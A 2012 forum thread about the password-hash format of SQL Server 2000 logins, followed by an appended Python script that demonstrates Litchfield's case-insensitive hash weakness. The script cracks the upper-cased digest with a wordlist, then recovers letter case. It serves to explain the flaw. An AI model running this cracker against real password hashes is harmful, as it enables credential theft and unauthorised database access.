Sunday, March 25, 2012

Algorithm used to encrypt password in sysxlogin

Hi,

Does anyone know which algorithm is being used to encrypt the passwords in the sysxlogins for SQL Server 2000? I've been googling for some time, but I can't seem to find this information. Please help.

Many thanks,

Leona

Laurentiu wrote a really good article on this topic, I hope you will find it useful:

http://blogs.msdn.com/lcris/archive/2007/04/30/sql-server-2005-about-login-password-hashes.aspx

-Raul Garcia

SDE/T

SQL Server Engine

|||

Hi Raul,

Thanks for the link provision. Yeah, I saw this information too after so much googling yesterday and I agree it's good. However, it's a pity it ain't official. I was hoping to find the information from an official source, like the MSDN online docs, knowledge base etc. I'm surprised that I can't seem to locate this information...

Cheers,

Leona

|||

Sometimes we don't have "official" documentation because of honest mistakes in the process and the intended documentation doesn't exist at all; in such cases I encourage everyone to give us the proper feedback and we will open bugs for our BOL and try to get them fixed (not always possible due to resource limitations, and I apologize for that). But on other occasions some parts of a feature are not documented on purpose, for good reason: if necessary, we reserve the right to change the implementation.

As Laurentiu mentioned in his article, previous versions of the algorithm were different, and even opened the possibility of attempting to break the passwords via the case-insensitive hashes (as documented by David Litchfield). If the password algorithm had been fully documented and supported, we might still need to face the same documented weakness in favor of backwards compatibility (probably with some obscure knob to disable it), as some applications may still be using it and we would need to go through the (painful) deprecation process.

On the other hand, we don't believe in security by obscurity, and whenever we have the opportunity some members of the SQL Server team (and sometimes even former members of the team, kudos to Laurentiu for all his help) like to "unofficially" document some features according to our customers' feedback or questions in the forums and/or our MSDN blogs, or when we believe it is useful information that should be documented but for some reason is not officially documented.

While information on our blogs is not considered “official”, at least I know Laurentiu and I try to validate it and make sure the information and samples we provide are valid (and hopefully useful) because we are trying to help the SQL Server community.

We really appreciate all your feedback as it helps us to improve.

Thanks a lot,

-Raul Garcia

SDE/T

SQL Server Engine
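To make the case-insensitive-hash weakness Raul refers to concrete, here is an added example (not code from the thread, from Laurentiu's article, or from SQL Server itself). It assumes the SQL Server 2000 pwdencrypt() layout as David Litchfield described it in his 2002 paper: a 0x0100 header, a 4-byte salt, SHA-1 over the UTF-16LE password plus salt, and a second SHA-1 over the UTF-16LE upper-cased password plus salt. The 2005 variant is assumed to drop that second hash. Function names, the sample password and the constructed candidate list are mine.

```python
import hashlib
import itertools
import os
from typing import Optional, Iterable

# Assumed layout (from Litchfield's description, not from this page):
#   0x0100 | salt(4) | SHA1(UTF16LE(pwd) + salt) | SHA1(UTF16LE(UPPER(pwd)) + salt)
HEADER = b"\x01\x00"
SALT_LEN = 4
SHA1_LEN = 20


def sql2000_pwdencrypt(password: str, salt: Optional[bytes] = None) -> bytes:
    """Reproduce the assumed SQL Server 2000 hash: case-sensitive + upper-cased digests."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be 4 bytes")
    cs = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    ci = hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    return HEADER + salt + cs + ci


def sql2005_pwdencrypt(password: str, salt: Optional[bytes] = None) -> bytes:
    """Assumed SQL Server 2005 hash: same header and salt, but only the case-sensitive digest."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be 4 bytes")
    return HEADER + salt + hashlib.sha1(password.encode("utf-16-le") + salt).digest()


def parse_sql2000(blob: bytes):
    """Split a 2000-style blob into (salt, case_sensitive_digest, upper_case_digest)."""
    if blob[:2] != HEADER or len(blob) != 2 + SALT_LEN + 2 * SHA1_LEN:
        raise ValueError("not a SQL Server 2000 style hash")
    salt = blob[2:2 + SALT_LEN]
    cs = blob[2 + SALT_LEN:2 + SALT_LEN + SHA1_LEN]
    ci = blob[2 + SALT_LEN + SHA1_LEN:]
    return salt, cs, ci


def crack_upper_hash(blob: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Step 1 of the documented attack: attack the upper-cased digest.

    Every candidate is hashed in upper case only, so a dictionary needs no case
    variants at all: the effective keyspace shrinks by 2^(number of letters).
    """
    salt, _, ci = parse_sql2000(blob)
    for cand in candidates:
        up = cand.upper()
        if hashlib.sha1(up.encode("utf-16-le") + salt).digest() == ci:
            return up
    return None


def recover_case(blob: bytes, upper_pwd: str) -> Optional[str]:
    """Step 2: once the upper-cased password is known, brute-force only the case
    of each letter against the case-sensitive digest (at most 2^letters tries)."""
    salt, cs, _ = parse_sql2000(blob)
    letter_pos = [i for i, c in enumerate(upper_pwd) if c.isalpha()]
    for bits in itertools.product((0, 1), repeat=len(letter_pos)):
        chars = list(upper_pwd)
        for bit, i in zip(bits, letter_pos):
            if bit:
                chars[i] = chars[i].lower()
        cand = "".join(chars)
        if hashlib.sha1(cand.encode("utf-16-le") + salt).digest() == cs:
            return cand
    return None


if __name__ == "__main__":
    # Constructed sample: a fixed salt so the run is reproducible.
    blob = sql2000_pwdencrypt("SeCret1", b"\x00\x01\x02\x03")
    wordlist = ["password", "admin", "secret1", "sa"]  # constructed, lower case only
    upper = crack_upper_hash(blob, wordlist)
    print("upper-case password:", upper)
    print("exact password:     ", recover_case(blob, upper))
    # The 2005-style blob has no upper-cased digest, so step 1 has nothing to attack.
    print("2005 blob length:", len(sql2005_pwdencrypt("SeCret1", b"\x00\x01\x02\x03")))
```

The point of the two-step split is that the expensive dictionary or brute-force phase runs against the case-insensitive digest, and the case-sensitive digest is only consulted afterwards for a tiny search; removing the second digest, as the 2005 layout in this example does, removes that shortcut.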
